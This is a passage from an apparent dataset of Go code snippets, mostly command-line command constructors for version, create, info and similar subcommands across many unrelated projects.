Volumes:\\t\\t%d\\n\", dashboard.VolumesCount)\n\tfmt.Fprintf(ctx.Stdout, \" Running servers:\\t%d\\n\", dashboard.RunningServersCount)\n\tfmt.Fprintf(ctx.Stdout, \" Images:\\t\\t%d\\n\", dashboard.ImagesCount)\n\tfmt.Fprintf(ctx.Stdout, \" Snapshots:\\t\\t%d\\n\", dashboard.SnapshotsCount)\n\tfmt.Fprintf(ctx.Stdout, \" Servers:\\t\\t%d\\n\", dashboard.ServersCount)\n\tfmt.Fprintf(ctx.Stdout, \" Ips:\\t\\t\\t%d\\n\", dashboard.IPsCount)\n\n\tfmt.Fprintf(ctx.Stdout, \"\\n\")\n\tpermissions, err := ctx.API.GetPermissions()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to get your permisssions\")\n\t}\n\tfmt.Fprintln(ctx.Stdout, \"Permissions:\")\n\tfor _, service := range permissions.Permissions {\n\t\tfor key, serviceName := range service {\n\t\t\tfmt.Fprintf(ctx.Stdout, \" %s\\n\", key)\n\t\t\tfor _, perm := range serviceName {\n\t\t\t\tfmt.Fprintf(ctx.Stdout, \" %s\\n\", perm)\n\t\t\t}\n\t\t}\n\t}\n\tfmt.Fprintf(ctx.Stdout, \"\\n\")\n\tquotas, err := ctx.API.GetQuotas()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to get your quotas\")\n\t}\n\tfmt.Fprintln(ctx.Stdout, \"Quotas:\")\n\tfor key, value := range quotas.Quotas {\n\t\tfmt.Fprintf(ctx.Stdout, \" %-20s: %d\\n\", key, value)\n\t}\n\treturn nil\n}", "func CreateChannelCmd(cdc *wire.Codec) *cobra.Command {\n\tflagTo := \"to\"\n\tflagCoins := \"amount\"\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a new payment channel\",\n\t\tLong: \"Create a new unidirectional payment channel from a local address to a remote address, funded with some amount of coins. These coins are removed from the sender account and put into the channel.\",\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\t// Create a \"client context\" stuct populated with info from common flags\n\t\t\tctx := context.NewCoreContextFromViper().WithDecoder(authcmd.GetAccountDecoder(cdc))\n\t\t\t// TODO is this needed for channelID\n\t\t\t// ctx.PrintResponse = true\n\n\t\t\t// Get sender adress\n\t\t\tsender, err := ctx.GetFromAddress()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Get receiver address\n\t\t\ttoStr := viper.GetString(flagTo)\n\t\t\treceiver, err := sdk.AccAddressFromBech32(toStr)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Get channel funding amount\n\t\t\tcoinsString := viper.GetString(flagCoins)\n\t\t\tcoins, err := sdk.ParseCoins(coinsString)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create the create channel msg to send\n\t\t\tmsg := paychan.MsgCreate{\n\t\t\t\tParticipants: [2]sdk.AccAddress{sender, receiver},\n\t\t\t\tCoins: coins,\n\t\t\t}\n\t\t\terr = msg.ValidateBasic()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Build and sign the transaction, then broadcast to the blockchain\n\t\t\terr = ctx.EnsureSignBuildBroadcast(ctx.FromAddressName, []sdk.Msg{msg}, cdc)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\tcmd.Flags().String(flagTo, \"\", \"Recipient address of the payment channel.\")\n\tcmd.Flags().String(flagCoins, \"\", \"Amount of coins to fund the payment channel with.\")\n\treturn cmd\n}", "func NewVersionCommand(settings *CmdSetting) *cobra.Command {\n\tversionCmd := &VersionCmd{settings: settings}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the version of kubectl-recreate\",\n\t\tSilenceUsage: true,\n\t\tRun: versionCmd.run,\n\t}\n\n\treturn cmd\n}", "func Version() cli.Command {\n\treturn cli.Command{\n\t\tName: \"version\",\n\t\tUsage: \"prints version information\",\n\t\tFlags: []cli.Flag{\n\t\t\tcli.BoolFlag{\n\t\t\t\tName: \"json\",\n\t\t\t\tUsage: \"specify this option to output data as JSON\",\n\t\t\t},\n\t\t},\n\t\tAction: func(c *cli.Context) error {\n\t\t\tisJSON := c.Bool(\"json\")\n\n\t\t\tinfo := versionInfo{\n\t\t\t\tCurator: curator.BuildRevision,\n\t\t\t\tJasper: curator.JasperChecksum,\n\t\t\t\tPoplarEvents: curator.PoplarEventsChecksum,\n\t\t\t\tPoplarRecorder: curator.PoplarRecorderChecksum,\n\t\t\t\tCedarMetrics: curator.CedarMetricsChecksum,\n\t\t\t}\n\t\t\tif isJSON {\n\t\t\t\tout, err := json.MarshalIndent(info, \"\", \" \")\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn errors.Wrap(err, \"marshalling JSON\")\n\t\t\t\t}\n\t\t\t\tfmt.Println(string(out))\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tfmt.Println(info)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func (n *NetworkCreateCommand) Init(c *Cli) {\n\tn.cli = c\n\n\tn.cmd = &cobra.Command{\n\t\tUse: \"create [OPTIONS] [NAME]\",\n\t\tShort: \"Create a pouch network\",\n\t\tLong: networkCreateDescription,\n\t\tArgs: cobra.MaximumNArgs(1),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn n.runNetworkCreate(args)\n\t\t},\n\t\tExample: networkCreateExample(),\n\t}\n\n\tn.addFlags()\n}", "func CreateParamsCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"zk\",\n\t\tShort: \"zk knowledge related parameters\",\n\t}\n\tcmd.AddCommand(mixCreateZkKeyCmd())\n\tcmd.AddCommand(mixReadZkKeyCmd())\n\n\treturn cmd\n}", "func NewCommand(\n\tname string,\n\tdescription string,\n\tversion string,\n\tnameConvertFunc spec.AttributeNameConverterFunc,\n\ttypeConvertFunc spec.AttributeTypeConverterFunc,\n\ttypeMappingName string,\n\tgeneratorFunc func([]spec.SpecificationSet, string) error,\n) *cobra.Command {\n\n\tcobra.OnInitialize(func() {\n\t\tviper.SetEnvPrefix(name)\n\t\tviper.AutomaticEnv()\n\t\tviper.SetEnvKeyReplacer(strings.NewReplacer(\"-\", \"_\"))\n\t})\n\n\tvar rootCmd = &cobra.Command{\n\t\tUse: name,\n\t\tShort: description,\n\t}\n\n\trootCmd.PersistentFlags().StringP(\"out\", \"o\", \"codegen\", \"Default output path.\")\n\n\tvar versionCmd = &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the version and exit.\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Println(version)\n\t\t},\n\t}\n\n\tvar cmdFolderGen = &cobra.Command{\n\t\tUse: \"folder\",\n\t\tShort: \"Generate the model using a local directory containing the specs.\",\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn viper.BindPFlags(cmd.Flags())\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tif len(viper.GetStringSlice(\"dir\")) == 0 {\n\t\t\t\treturn errors.New(\"--dir is required\")\n\t\t\t}\n\n\t\t\tvar specSets []spec.SpecificationSet\n\n\t\t\tfor _, dir := range viper.GetStringSlice(\"dir\") {\n\t\t\t\tset, err := spec.LoadSpecificationSet(\n\t\t\t\t\tdir,\n\t\t\t\t\tnameConvertFunc,\n\t\t\t\t\ttypeConvertFunc,\n\t\t\t\t\ttypeMappingName,\n\t\t\t\t)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tspecSets = append(specSets, set)\n\t\t\t}\n\n\t\t\treturn generatorFunc(specSets, viper.GetString(\"out\"))\n\t\t},\n\t}\n\tcmdFolderGen.Flags().StringSliceP(\"dir\", \"d\", nil, \"Path of the specifications folder.\")\n\n\tvar githubGen = &cobra.Command{\n\t\tUse: \"github\",\n\t\tShort: \"Generate the model using a remote github repository.\",\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn viper.BindPFlags(cmd.Flags())\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tspecSet, err := spec.LoadSpecificationSetFromGithub(\n\t\t\t\tviper.GetString(\"token\"),\n\t\t\t\tviper.GetString(\"repo\"),\n\t\t\t\tviper.GetString(\"ref\"),\n\t\t\t\tviper.GetString(\"path\"),\n\t\t\t\tnameConvertFunc,\n\t\t\t\ttypeConvertFunc,\n\t\t\t\ttypeMappingName,\n\t\t\t)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treturn generatorFunc([]spec.SpecificationSet{specSet}, viper.GetString(\"out\"))\n\t\t},\n\t}\n\tgithubGen.Flags().StringP(\"repo\", \"r\", \"\", \"Endpoint for the github api.\")\n\tgithubGen.Flags().StringP(\"path\", \"p\", \"\", \"Internal path to a directory in the repo if not in the root.\")\n\tgithubGen.Flags().StringP(\"ref\", \"R\", \"master\", \"Branch or tag to use.\")\n\tgithubGen.Flags().StringP(\"token\", \"t\", \"\", \"The api token to use.\")\n\n\trootCmd.AddCommand(\n\t\tversionCmd,\n\t\tcmdFolderGen,\n\t\tgithubGen,\n\t)\n\n\treturn rootCmd\n}", "func CreateCommand(srv *server.Server) (cmd command.LundeCommand, err error) {\n\tth := textHandler{srv}\n\tcmd = command.LundeCommand{\n\t\tHandleInteraction: th.handleInteraction,\n\t\tCommandData: api.CreateCommandData{\n\t\t\tName: \"text\",\n\t\t\tDescription: \"corrupt or convert a given message, or the last message in the channel\",\n\t\t\tOptions: []discord.CommandOption{\n\t\t\t\t&discord.StringOption{\n\t\t\t\t\tOptionName: \"algo\",\n\t\t\t\t\tDescription: \"what algorithm to convert/corrupt the text with\",\n\t\t\t\t\tRequired: true,\n\t\t\t\t\tChoices: []discord.StringChoice{\n\t\t\t\t\t\t{Name: \"spunge\", Value: \"spunge\"},\n\t\t\t\t\t\t{Name: \"zalgo\", Value: \"zalgo\"},\n\t\t\t\t\t\t{Name: \"chonk\", Value: \"chonk\"},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t&discord.StringOption{\n\t\t\t\t\tOptionName: \"message\",\n\t\t\t\t\tDescription: \"optional message to convert/corrupt\",\n\t\t\t\t\tRequired: false,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\treturn\n}", "func (factory *ListWsFactory) CreateCommand() BaseCommand {\n\n\treturn BaseCommand{\n\t\tCommand: \"ls\",\n\t\tDescription: \"List all workspaces with fancy information.\",\n\t\tAliases: []string{},\n\t\tAction: func(c WSCommandContext) {\n\t\t\tfactory.listWsExec(&c)\n\t\t},\n\t\tFlags: []StringFlag{\n\t\t\tStringFlag{\n\t\t\t\t\"table\",\n\t\t\t\t\"formats the table using the `template`\",\n\t\t\t},\n\t\t},\n\t}\n}", "func (srv *Server) CmdInfo(stdin io.ReadCloser, stdout io.Writer, args ...string) error {\n\timages, _ := srv.runtime.graph.All()\n\tvar imgcount int\n\tif images == nil {\n\t\timgcount = 0\n\t} else {\n\t\timgcount = len(images)\n\t}\n\tcmd := rcli.Subcmd(stdout, \"info\", \"\", \"Display system-wide information.\")\n\tif err := cmd.Parse(args); err != nil {\n\t\treturn nil\n\t}\n\tif cmd.NArg() > 0 {\n\t\tcmd.Usage()\n\t\treturn nil\n\t}\n\tfmt.Fprintf(stdout, \"containers: %d\\nversion: %s\\nimages: %d\\n\",\n\t\tlen(srv.runtime.List()),\n\t\tVERSION,\n\t\timgcount)\n\n\tif !rcli.DEBUG_FLAG {\n\t\treturn nil\n\t}\n\tfmt.Fprintln(stdout, \"debug mode enabled\")\n\tfmt.Fprintf(stdout, \"fds: %d\\ngoroutines: %d\\n\", getTotalUsedFds(), runtime.NumGoroutine())\n\treturn nil\n}", "func New() *Info {\n\tthis := new(Info)\n\tthis.Prompt = \">>>\"\n\tthis.In = os.Stdin\n\tthis.Out = os.Stdout\n\tthis.Escape = '\\\\'\n\tthis.char = make([]byte, 1, 1)\n\treturn this\n}", "func (cc *ComplaintCreate) SetInfo(s string) *ComplaintCreate {\n\tcc.mutation.SetInfo(s)\n\treturn cc\n}", "func info(command interface{}) (*CommandInfo, error) {\n\ttypeof := reflect.TypeOf(command)\n\n\t// Going up the pointer chain to find the underlying struct\n\tfor typeof.Kind() == reflect.Ptr {\n\t\ttypeof = typeof.Elem()\n\t}\n\n\tfield, ok := typeof.FieldByName(\"_\")\n\tif !ok {\n\t\treturn nil, fmt.Errorf(`missing meta (\"_\") field in %#v`, command)\n\t}\n\n\tname, nameOk := field.Tag.Lookup(\"name\")\n\tdescription, _ := field.Tag.Lookup(\"description\")\n\n\tif !nameOk {\n\t\treturn nil, fmt.Errorf(`missing \"name\" key in the tag string of %#v`, command)\n\t}\n\n\tinfo := &CommandInfo{\n\t\tName: name,\n\t\tDescription: description,\n\t}\n\n\treturn info, nil\n}", "func (e *DefaultExecutor) runInfoCommand(args []string, isAuthChannel bool) string {\n\tif !isAuthChannel {\n\t\treturn \"\"\n\t}\n\tif len(args) > 1 && args[1] != string(infoList) {\n\t\treturn IncompleteCmdMsg\n\t}\n\n\tclusterName := e.cfg.Settings.ClusterName\n\tif len(args) > 3 && args[2] == ClusterFlag.String() && args[3] != clusterName {\n\t\treturn fmt.Sprintf(WrongClusterCmdMsg, args[3])\n\t}\n\n\tallowedVerbs := e.getSortedEnabledCommands(\"allowed verbs\", e.resMapping.AllowedKubectlVerbMap)\n\tallowedResources := e.getSortedEnabledCommands(\"allowed resources\", e.resMapping.AllowedKubectlResourceMap)\n\treturn fmt.Sprintf(\"%s%s\", allowedVerbs, allowedResources)\n}", "func NewCmdCreate(o *options.ArgoRolloutsOptions) *cobra.Command {\n\tcreateOptions := CreateOptions{\n\t\tArgoRolloutsOptions: *o,\n\t}\n\tvar cmd = &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a Rollout, Experiment, AnalysisTemplate, ClusterAnalysisTemplate, or AnalysisRun resource\",\n\t\tLong: \"This command creates a new Rollout, Experiment, AnalysisTemplate, ClusterAnalysisTemplate, or AnalysisRun resource from a file.\",\n\t\tExample: o.Example(createExample),\n\t\tSilenceUsage: true,\n\t\tRunE: func(c *cobra.Command, args []string) error {\n\t\t\tcreateOptions.DynamicClientset()\n\t\t\tif len(createOptions.Files) == 0 {\n\t\t\t\treturn o.UsageErr(c)\n\t\t\t}\n\t\t\tif len(createOptions.Files) > 1 && createOptions.Watch {\n\t\t\t\treturn errors.New(\"Cannot watch multiple resources\")\n\t\t\t}\n\n\t\t\tvar objs []runtime.Object\n\t\t\tfor _, f := range createOptions.Files {\n\t\t\t\tobj, err := createOptions.createResource(f)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tobjs = append(objs, obj)\n\t\t\t}\n\t\t\tif createOptions.Watch {\n\t\t\t\tswitch obj := objs[0].(type) {\n\t\t\t\tcase *v1alpha1.Rollout:\n\t\t\t\t\tgetCmd := get.NewCmdGetRollout(o)\n\t\t\t\t\tgetCmd.SetArgs([]string{obj.Name, \"--watch\"})\n\t\t\t\t\treturn getCmd.Execute()\n\t\t\t\tcase *v1alpha1.Experiment:\n\t\t\t\t\tgetCmd := get.NewCmdGetExperiment(o)\n\t\t\t\t\tgetCmd.SetArgs([]string{obj.Name, \"--watch\"})\n\t\t\t\t\treturn getCmd.Execute()\n\t\t\t\tdefault:\n\t\t\t\t\treturn errors.New(\"Can only watch resources of type Rollout or Experiment\")\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\tcmd.AddCommand(NewCmdCreateAnalysisRun(o))\n\tcmd.Flags().StringArrayVarP(&createOptions.Files, \"filename\", \"f\", []string{}, \"Files to use to create the resource\")\n\tcmd.Flags().BoolVarP(&createOptions.Watch, \"watch\", \"w\", false, \"Watch live updates to the resource after creating\")\n\tcmd.Flags().BoolVar(&createOptions.NoColor, \"no-color\", false, \"Do not colorize output\")\n\treturn cmd\n}", "func NewCommand(version string) *cobra.Command {\n\trootCommand := &cobra.Command{\n\t\tUse: name,\n\t\tVersion: version,\n\t}\n\trootCommand.SetOut(logrus.New().Out)\n\n\tfor _, sourceProvider := range source.GetProviderList() {\n\t\tsourceCmd := &cobra.Command{\n\t\t\tUse: sourceProvider.Name(),\n\t\t\tShort: fmt.Sprintf(`Fetch data from source \"%s\"`, sourceProvider.Name()),\n\t\t}\n\t\tif sourceProvider.Deprecated() {\n\t\t\tsourceCmd.Deprecated = fmt.Sprintf(`source \"%s\" is deprecated`, sourceProvider.Name())\n\t\t}\n\t\tfor _, registryProvider := range registry.GetProviderList() {\n\t\t\tregistryCmd := &cobra.Command{\n\t\t\t\tUse: registryProvider.Name(),\n\t\t\t\tShort: fmt.Sprintf(`Save data in registry \"%s\"`, registryProvider.Name()),\n\t\t\t}\n\t\t\tif registryProvider.Deprecated() {\n\t\t\t\tregistryCmd.Deprecated = fmt.Sprintf(`registry \"%s\" is deprecated`, registryProvider.Name())\n\t\t\t}\n\t\t\tonceCommand := &cobra.Command{\n\t\t\t\tUse: `once`,\n\t\t\t\tShort: `Run main process only once: sync and return result`,\n\t\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\t\tmanager, cleanup, err := newManager(cmd.Flags(), sourceProvider.Factory(), registryProvider.Factory())\n\t\t\t\t\tif cleanup != nil {\n\t\t\t\t\t\tcleanup()\n\t\t\t\t\t}\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn errors.Wrap(err, `failed to bootstrap manager`)\n\t\t\t\t\t}\n\t\t\t\t\treturn manager.Run(cmd.Context())\n\t\t\t\t},\n\t\t\t}\n\t\t\twatchCommand := &cobra.Command{\n\t\t\t\tUse: `watch`,\n\t\t\t\tShort: `Run main process as daemon: sync repeatedly with constant interval`,\n\t\t\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\t\t\tsc, cleanup, err := newScheduler(cmd.Flags(), sourceProvider.Factory(), registryProvider.Factory())\n\t\t\t\t\tif cleanup != nil {\n\t\t\t\t\t\tcleanup()\n\t\t\t\t\t}\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn errors.Wrap(err, `failed to bootstrap scheduler`)\n\t\t\t\t\t}\n\t\t\t\t\tsc.Run(cmd.Context())\n\t\t\t\t\treturn nil\n\t\t\t\t},\n\t\t\t}\n\t\t\twatchCommand.Flags().Duration(`scheduler.interval`, time.Minute, `Interval between manager runs (1s, 1m, 5m, 1h and others)`)\n\t\t\tregistryCmd.PersistentFlags().Bool(`manager.continue-on-error`, false, `Omit errors during process manager`)\n\t\t\tregistryCmd.PersistentFlags().Bool(`manager.exit-on-error`, false, `Stop manager process on first error and by pass it to command line`)\n\t\t\t_ = registryCmd.PersistentFlags().MarkDeprecated(`manager.continue-on-error`, `Flag \"manager.continue-on-error\" is deprecated, use \"manager.exit-on-error\" instead`)\n\t\t\t_ = registryCmd.PersistentFlags().MarkHidden(`manager.continue-on-error`)\n\t\t\tregistryCmd.PersistentFlags().AddFlagSet(registryProvider.Flags())\n\t\t\tregistryCmd.AddCommand(onceCommand)\n\t\t\tregistryCmd.AddCommand(watchCommand)\n\t\t\tsourceCmd.AddCommand(registryCmd)\n\t\t}\n\t\tsourceCmd.PersistentFlags().AddFlagSet(sourceProvider.Flags())\n\t\trootCommand.AddCommand(sourceCmd)\n\t}\n\trootCommand.PersistentFlags().String(`logger.level`, logrus.InfoLevel.String(), `Log level`)\n\treturn rootCommand\n}", "func (c *CoinInfoClient) Create() *CoinInfoCreate {\n\tmutation := newCoinInfoMutation(c.config, OpCreate)\n\treturn &CoinInfoCreate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func NewCommand() (cmd *cobra.Command) {\n\tcmd = &cobra.Command{Use: \"binctl\", Run: func(cmd *cobra.Command, args []string) {\n\t\t//fmt.Println(\"Operate pipeline\")\n\t\t//fmt.Println(\"init binctl\")\n\t}}\n\tcmd.AddCommand(cmdMemory())\n\tcmd.AddCommand(cmdPipeline())\n\tcmd.PersistentFlags().String(\"config\", \"./configs/binlogo.yaml\", \"config file default is ./configs/binlogo.yaml\")\n\terr := viper.BindPFlag(\"config\", cmd.PersistentFlags().Lookup(\"config\"))\n\t// configs.InitViperFromFile(viper.GetString(\"config\"))\n\tconfigs.Init(viper.GetString(\"config\"))\n\t//etcd2.DefaultETCD()\n\tblog.Env(configs.Env(viper.GetString(\"env\")))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\treturn\n}", "func (bot *DiscordBot) CreateCommand(ctx context.Context, command *discordgo.ApplicationCommand) error {\n\tbot.logger.Info(\"Create command\", \"command\", command)\n\n\t// TODO: store the output somewhere\n\t// _, err := session.ApplicationCommandCreate(session.State.User.ID, \"\", applicationCommand)\n\t// if err != nil {\n\t// \treturn fmt.Errorf(\"create command '%s': %w\", name, err)\n\t// }\n\n\treturn nil\n}", "func CreateCommand(id IDType, op CommandOp, key, value []byte) *Command {\n\tcmd := Command{ID: id, Op: op, Key: key, Value: value}\n\n\treturn &cmd\n}", "func NewPingCreateCommand(p *commands.KnParams) *cobra.Command {\n\tvar updateFlags pingUpdateFlags\n\tvar sinkFlags flags.SinkFlags\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create NAME --sink SINK\",\n\t\tShort: \"Create a ping source\",\n\t\tExample: `\n # Create a Ping source 'my-ping' which fires every two minutes and sends '{ value: \"hello\" }' to service 'mysvc' as a cloudevent\n kn source ping create my-ping --schedule \"*/2 * * * *\" --data '{ value: \"hello\" }' --sink ksvc:mysvc`,\n\n\t\tRunE: func(cmd *cobra.Command, args []string) (err error) {\n\t\t\tif len(args) != 1 {\n\t\t\t\treturn errors.New(\"requires the name of the Ping source to create as single argument\")\n\n\t\t\t}\n\t\t\tname := args[0]\n\n\t\t\tpingSourceClient, err := newPingSourceClient(p, cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tnamespace, err := p.GetNamespace(cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdynamicClient, err := p.NewDynamicClient(namespace)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tdestination, err := sinkFlags.ResolveSink(cmd.Context(), dynamicClient, namespace)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tceOverridesMap, err := util.MapFromArrayAllowingSingles(updateFlags.ceOverrides, \"=\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tceOverridesToRemove := util.ParseMinusSuffix(ceOverridesMap)\n\n\t\t\tdata, dataBase64, err := getDataFields(&updateFlags)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"cannot create PingSource %q in namespace \"+\n\t\t\t\t\t\"%q because: %s\", name, namespace, err)\n\t\t\t}\n\n\t\t\terr = pingSourceClient.CreatePingSource(cmd.Context(), clientsourcesv1beta2.NewPingSourceBuilder(name).\n\t\t\t\tSchedule(updateFlags.schedule).\n\t\t\t\tData(data).\n\t\t\t\tDataBase64(dataBase64).\n\t\t\t\tSink(*destination).\n\t\t\t\tCloudEventOverrides(ceOverridesMap, ceOverridesToRemove).\n\t\t\t\tBuild())\n\t\t\tif err == nil {\n\t\t\t\tfmt.Fprintf(cmd.OutOrStdout(), \"Ping source '%s' created in namespace '%s'.\\n\", args[0], pingSourceClient.Namespace())\n\t\t\t}\n\t\t\treturn err\n\t\t},\n\t}\n\tcommands.AddNamespaceFlags(cmd.Flags(), false)\n\tupdateFlags.addFlags(cmd)\n\tsinkFlags.Add(cmd)\n\tcmd.MarkFlagRequired(\"sink\")\n\n\treturn cmd\n}", "func newCertCreateCaCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"create-ca\",\n\t\tShort: \"create a CA Certificate and Key\",\n\t\tPreRun: func(cmd *cobra.Command, args []string) {\n\t\t\tgApp.Config.SetLocalFlagsFromFile(cmd)\n\t\t},\n\t\tRunE: gApp.RunECertCreateCa,\n\t\tSilenceUsage: true,\n\t}\n\tgApp.InitCertCreateCaFlags(cmd)\n\treturn cmd\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints out build version information\",\n\t\tLong: \"Prints out build version information\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Printf(`Version: %v\nGitRevision: %v\nGolangVersion: %v\n`,\n\t\t\t\tversion.VelaVersion,\n\t\t\t\tversion.GitRevision,\n\t\t\t\truntime.Version())\n\t\t},\n\t\tAnnotations: map[string]string{\n\t\t\ttypes.TagCommandType: types.TypePlugin,\n\t\t},\n\t}\n}", "func NewCommandNode(info token.FileInfo, name string, multiline bool) *CommandNode {\n\treturn &CommandNode{\n\t\tNodeType: NodeCommand,\n\t\tFileInfo: info,\n\n\t\tname: name,\n\t\tmulti: multiline,\n\t}\n}", "func handleNewCommand() {\n\tneoCliRoot := os.Getenv(\"GOPATH\") + \"/src/github.com/ivpusic/neo/cmd/neo\"\n\n\tif len(*templateName) == 0 {\n\t\tlogger.Info(\"Creating Neo project\")\n\t\trunCmd(neoCliRoot+\"/scripts/neo-template\", []string{*projectName})\n\n\t} else {\n\t\tswitch *templateName {\n\t\tcase \"angular\":\n\t\t\tlogger.Info(\"Creating Neo Angular project\")\n\t\t\trunCmd(neoCliRoot+\"/scripts/angular-template\", []string{*projectName})\n\t\tcase \"html\":\n\t\t\tlogger.Info(\"Creating Neo HTML project\")\n\t\t\trunCmd(neoCliRoot+\"/scripts/neo-html-template\", []string{*projectName})\n\t\tdefault:\n\t\t\tlogger.Errorf(\"Unkonown template %s!\", *projectName)\n\t\t}\n\t}\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the kperf version\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcmd.Printf(\"Version: %s\\n\", Version)\n\t\t\tcmd.Printf(\"Build Date: %s\\n\", BuildDate)\n\t\t\tcmd.Printf(\"Git Revision: %s\\n\", GitRevision)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func Main() *cobra.Command {\n\tcreateCmd := preview.NewCmdPreviewLegacy()\n\n\tcmd := &cobra.Command{\n\t\tUse: rootcmd.TopLevelCommand,\n\t\tShort: \"Preview commands\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif len(args) <= 1 {\n\t\t\t\tlog.Logger().Info(\"aliasing this to the create command\")\n\t\t\t\terr := createCmd.ParseFlags(args)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Logger().Errorf(err.Error())\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tcreateCmd.Run(cmd, args)\n\t\t\t\treturn\n\t\t\t}\n\t\t\terr := cmd.Help()\n\t\t\tif err != nil {\n\t\t\t\tlog.Logger().Errorf(err.Error())\n\t\t\t}\n\t\t},\n\t\tDisableFlagParsing: true,\n\t}\n\tcmd.AddCommand(createCmd)\n\tcmd.AddCommand(cobras.SplitCommand(version.NewCmdVersion()))\n\treturn cmd\n}", "func newVersion() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"show build version\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tfmt.Println(version)\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn cmd\n}", "func (c *Chip) createInfoWatcher() error {\n\tiw, err := newInfoWatcher(int(c.f.Fd()),\n\t\tfunc(lic LineInfoChangeEvent) {\n\t\t\tc.mu.Lock()\n\t\t\tich := c.ich[lic.Info.Offset]\n\t\t\tc.mu.Unlock() // handler called outside lock\n\t\t\tif ich != nil {\n\t\t\t\tich(lic)\n\t\t\t}\n\t\t},\n\t\tc.options.abi)\n\tif err != nil {\n\t\treturn err\n\t}\n\tc.iw = iw\n\tc.ich = map[int]InfoChangeHandler{}\n\treturn nil\n}", "func newActivateCmd(clientFn func() (*fic.ServiceClient, error), out io.Writer) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"activate <id>\",\n\t\tShort: \"Activate port\",\n\t\tExample: \"fic ports activate F012000000168\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tclient, err := clientFn()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"creating FIC client: %w\", err)\n\t\t\t}\n\n\t\t\tport, err := ports.Activate(client, args[0]).Extract()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"calling Activate port API: %w\", err)\n\t\t\t}\n\n\t\t\tt := utils.NewTabby(out)\n\t\t\tt.AddHeader(\"id\", \"name\", \"operationStatus\", \"isActivated\", \"vlanRanges\", \"tenantID\", \"switchName\",\n\t\t\t\t\"portType\", \"location\", \"area\", \"operationID\")\n\t\t\tt.AddLine(port.ID, port.Name, port.OperationStatus, port.IsActivated, port.VLANRanges, port.TenantID, port.SwitchName,\n\t\t\t\tport.PortType, port.Location, port.Area, port.OperationID)\n\t\t\tt.Print()\n\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: 